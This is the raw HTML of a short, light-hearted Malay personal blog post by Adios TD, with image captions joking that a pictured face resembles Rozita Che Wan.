<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGgaxkeBinrKLD1jMZ4x05HqGkhlHbBLvMPxM_rZ3I_Fvl6QSon4NP3VAyAvstkjFCh29HkjDZqhr0g_KoI6KB3odbVtpkIUHajeU5Eo9dRHyozHza9OAGBu2HoVQD1V22CEXj4FeHbyW8/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGgaxkeBinrKLD1jMZ4x05HqGkhlHbBLvMPxM_rZ3I_Fvl6QSon4NP3VAyAvstkjFCh29HkjDZqhr0g_KoI6KB3odbVtpkIUHajeU5Eo9dRHyozHza9OAGBu2HoVQD1V22CEXj4FeHbyW8/s1600/images.jpg" /></a></div><div style="text-align: center;">and lastly pic paling susah Adios nk bg :D</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;">tapi xpe...for my readers only :D</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3sRkWNTGSuAn6MQOqTaSMqYDc7V8RApfvqDBXyRV5Z2KePXON3Q3uHc2u5F4JkN_WTkgo9YvW_9biHUWnEVfkEvjUxwVAm0c2-eJvqm0ecFZGtyruEZ1YdWGmxlhaItmgNUh5VhHGS2lq/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3sRkWNTGSuAn6MQOqTaSMqYDc7V8RApfvqDBXyRV5Z2KePXON3Q3uHc2u5F4JkN_WTkgo9YvW_9biHUWnEVfkEvjUxwVAm0c2-eJvqm0ecFZGtyruEZ1YdWGmxlhaItmgNUh5VhHGS2lq/s1600/1.jpg" /></a></div><div style="text-align: center;">hahaha...motif xdapat dikenalpasti...sbb Adios rse muke Rozita Che Wan hampir serupa :D</div><div style="text-align: center;">sorry.... jgn mrah ek akak/makcik rozita :D</div><div style="text-align: center;">smile always </div><div style="text-align: center;">bye2</div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0